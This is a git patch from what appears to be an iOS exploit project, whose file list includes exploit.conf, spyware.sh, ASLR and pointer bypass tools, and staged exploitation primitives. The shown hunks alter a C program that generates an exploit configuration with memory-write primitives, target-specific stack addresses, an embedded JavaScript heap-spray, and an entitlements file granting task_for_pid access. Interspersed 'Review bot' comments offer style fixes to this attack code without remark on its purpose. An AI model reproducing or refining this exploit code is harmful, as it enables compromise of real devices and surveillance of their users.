From 3dea872119219789ff85daef37f059eefc709871 Mon Sep 17 00:00:00 2001
From: spv420
Date: Sat, 23 Apr 2022 16:23:39 -0400
Subject: shitdick
---
 build.sh | 0
 build_native.sh | 0
 exploit.conf | 0
 install.sh | 0
 install_native.sh | 0
 js/main.js | 2 +-
 spyware.sh | 0
 src/common.h | 0
 src/ip_tools.c | 0
 src/ip_tools.h | 0
 src/main.c | 11 +++++++----
 src/patchfinder.h | 0
 src/stage0_primitives.c | 0
 src/stage0_primitives.h | 0
 src/stage1_primitives.c | 0
 src/stage1_primitives.h | 0
 tools/build.sh | 0
 tools/ent.xml | 28 ++++++++++++++--------------
 tools/fuck_aslr.c | 0
 tools/fuck_ptr.c | 0
 tools/jit_all_the_things.c | 0
 tools/test.c | 0
 22 files changed, 22 insertions(+), 19 deletions(-)
 mode change 100755 => 100644 build.sh
 mode change 100755 => 100644 build_native.sh
 mode change 100755 => 100644 exploit.conf
 mode change 100755 => 100644 install.sh
 mode change 100755 => 100644 install_native.sh
 mode change 100755 => 100644 spyware.sh
 mode change 100755 => 100644 src/common.h
 mode change 100755 => 100644 src/ip_tools.c
 mode change 100755 => 100644 src/ip_tools.h
 mode change 100755 => 100644 src/patchfinder.h
 mode change 100755 => 100644 src/stage0_primitives.c
 mode change 100755 => 100644 src/stage0_primitives.h
 mode change 100755 => 100644 src/stage1_primitives.c
 mode change 100755 => 100644 src/stage1_primitives.h
 mode change 100755 => 100644 tools/build.sh
 mode change 100755 => 100644 tools/ent.xml
 mode change 100755 => 100644 tools/fuck_aslr.c
 mode change 100755 => 100644 tools/fuck_ptr.c
 mode change 100755 => 100644 tools/jit_all_the_things.c
 mode change 100755 => 100644 tools/test.c
diff --git a/build.sh b/build.sh
old mode 100755
new mode 100644
diff --git a/build_native.sh b/build_native.sh
old mode 100755
new mode 100644
diff --git a/exploit.conf b/exploit.conf
old mode 100755
new mode 100644
diff --git a/install.sh b/install.sh
old mode 100755
new mode 100644
diff --git a/install_native.sh b/install_native.sh
old mode 100755
new mode 100644
diff --git a/js/main.js b/js/main.js
index b75af4e..7f1e78e 100644
--- a/js/main.js
+++ b/js/main.js
@@ -69,7 +69,7 @@ function main() {
 // call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x28, 0x148000, i, slide);
 // call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x14a000, 0, 0), 1, 0x1, 0x2, 0x3);
 calls4arg("syslog\0", 0x28, sptr("get rekt from jsc %d (slide=%x)\n\0"), i, 0);
- calls4arg("sleep", 1, 0, 0, 0);
+// calls4arg("sleep", 1, 0, 0, 0);
 i++;
 // call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x148000, i, 0x2, 0x3);
 }
diff --git a/spyware.sh b/spyware.sh
old mode 100755
new mode 100644
diff --git a/src/common.h b/src/common.h
old mode 100755
new mode 100644
diff --git a/src/ip_tools.c b/src/ip_tools.c
old mode 100755
new mode 100644
diff --git a/src/ip_tools.h b/src/ip_tools.h
old mode 100755
new mode 100644
diff --git a/src/main.c b/src/main.c
index 124affa..3c8d513 100644
--- a/src/main.c
+++ b/src/main.c
@@ -202,11 +202,11 @@ int main(int argc,
 fprintf(fp, "# - with love from spv <3\n");
 fprintf(fp, "\n");
-// uint32_t stack_base = 0x1c7738; // my shell setup
+ uint32_t stack_base = 0x1c7738; // my shell setup
 // uint32_t stack_base = 0x1c7c88; // my 4s shell setup
 // uint32_t stack_base = 0x1c2e48; // my lldb
 // uint32_t stack_base = 0x1c7d68; // btserver env
- uint32_t stack_base = 0x1c7dd8; // wifiFirmwareLoader env
+// uint32_t stack_base = 0x1c7dd8; // wifiFirmwareLoader env
 uint32_t magic_trigger_addr = 0xb6074;
 uint32_t mov_r0_0_bx_lr = 0x8d3e | 1;
@@ -286,6 +286,9 @@ int main(int argc,
 0x42424242));
 #endif
+ fprintf(fp, "%s\n", write32_unslid(stack_base - 0x948, 0x41414141));
+ fprintf(fp, "mode_cfg{dns41.1.1.1;}");
+
 #if 0
 // fprintf(fp,
 // "%s\n",
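Review bot: Commenting out `calls4arg("sleep", 1, 0, 0, 0);` leaves a fourth piece of dead code in a loop body that already carries three commented-out `call4arg` lines, so the live statements are now the minority of what a reader has to scan. Delete the line instead — version control keeps the history — or, if the delay is meant to be switched on and off, put it behind a named flag so the intent is visible at the call site. The enclosing main() starts and ends outside this hunk.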
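Review bot: The target environment is chosen by swapping which `uint32_t stack_base = …;` line is commented out, and the hunk shows this is now the fifth variant in the same list; the value in effect is invisible outside this block and a rebuild can silently pick up a different one. Make the choice a single definition that can be overridden at build time — `#define STACK_BASE 0x1c7738 // my shell setup; override with -DSTACK_BASE=…` inside an `#ifndef STACK_BASE` guard, then `uint32_t stack_base = STACK_BASE;` — and keep the other four values in one comment block naming the environment each belongs to. Writing the chosen value into the header that the preceding fprintf calls emit would also let the generated output record which configuration produced it. main() continues on both sides of this hunk.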
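Review bot: The new `fprintf(fp, "mode_cfg{dns41.1.1.1;}");` emits no trailing newline, while the `write32_unslid` line directly above it and the fprintf calls visible in the earlier hunk all terminate their output with `\n`, so whatever is written to fp next is appended to the same line; if that is not intended, use `fprintf(fp, "mode_cfg{dns41.1.1.1;}\n");`. Since the string is a constant with no conversions, `fputs("mode_cfg{dns41.1.1.1;}\n", fp);` is the more direct call and avoids format-string handling entirely. The literal also reads as though a separator between `dns` and `1.1.1.1` may be missing — worth confirming against whatever consumes this output, since nothing in the hunk shows the expected syntax. main() continues outside this hunk.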
@@ -334,7 +337,7 @@ int main(int argc,
 "var parent = new Uint8Array(0x100);"
 "var child = new Uint8Array(0x100);"
 " var fuck = new Array();"
- " for (var i = 0; i < 0x10000; i++) {"
+ " for (var i = 0; i < 0x200000; i++) {"
 " fuck[i] = i;"
 " }"
 " delete fuck;"
@@ -343,7 +346,7 @@ int main(int argc,
 strlen("var parent = new Uint8Array(0x100);"
 "var child = new Uint8Array(0x100);"
 " var fuck = new Array();"
- " for (var i = 0; i < 0x10000; i++) {"
+ " for (var i = 0; i < 0x200000; i++) {"
 " fuck[i] = i;"
 " }"
 " delete fuck;"
diff --git a/src/patchfinder.h b/src/patchfinder.h
old mode 100755
new mode 100644
diff --git a/src/stage0_primitives.c b/src/stage0_primitives.c
old mode 100755
new mode 100644
diff --git a/src/stage0_primitives.h b/src/stage0_primitives.h
old mode 100755
new mode 100644
diff --git a/src/stage1_primitives.c b/src/stage1_primitives.c
old mode 100755
new mode 100644
diff --git a/src/stage1_primitives.h b/src/stage1_primitives.h
old mode 100755
new mode 100644
diff --git a/tools/build.sh b/tools/build.sh
old mode 100755
new mode 100644
diff --git a/tools/ent.xml b/tools/ent.xml
old mode 100755
new mode 100644
index 35801e8..2973d1d
--- a/tools/ent.xml
+++ b/tools/ent.xml
@@ -1,15 +1,15 @@
- - - - platform-application - - com.apple.private.security.no-container - - com.apple.system-task-ports - - task_for_pid-allow - - get-task-allow - - + + + + platform-application + + com.apple.private.security.no-container + + com.apple.system-task-ports + + task_for_pid-allow + + get-task-allow + + 
\ No newline at end of file
diff --git a/tools/fuck_aslr.c b/tools/fuck_aslr.c
old mode 100755
new mode 100644
diff --git a/tools/fuck_ptr.c b/tools/fuck_ptr.c
old mode 100755
new mode 100644
diff --git a/tools/jit_all_the_things.c b/tools/jit_all_the_things.c
old mode 100755
new mode 100644
diff --git a/tools/test.c b/tools/test.c
old mode 100755
new mode 100644
-- 
cgit v1.2.3
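Review bot: The JavaScript literal is spelled out twice — once in the write at `@@ -334` and again inside `strlen(…)` at `@@ -343` — and this commit had to apply the identical `0x10000` → `0x200000` edit to both copies, which is exactly the drift hazard a duplicated literal creates; the next edit that touches only one copy leaves the length and the content disagreeing. Hoist it into one definition, `static const char js_payload[] = "var parent = new Uint8Array(0x100);" /* … */;`, and refer to `js_payload` in the write and `sizeof js_payload - 1` (or `strlen(js_payload)`) for the length, so the loop bound is changed in one place. The enclosing expressions in both hunks begin before the hunk context, so the exact call sites are not visible here; main() continues outside both hunks.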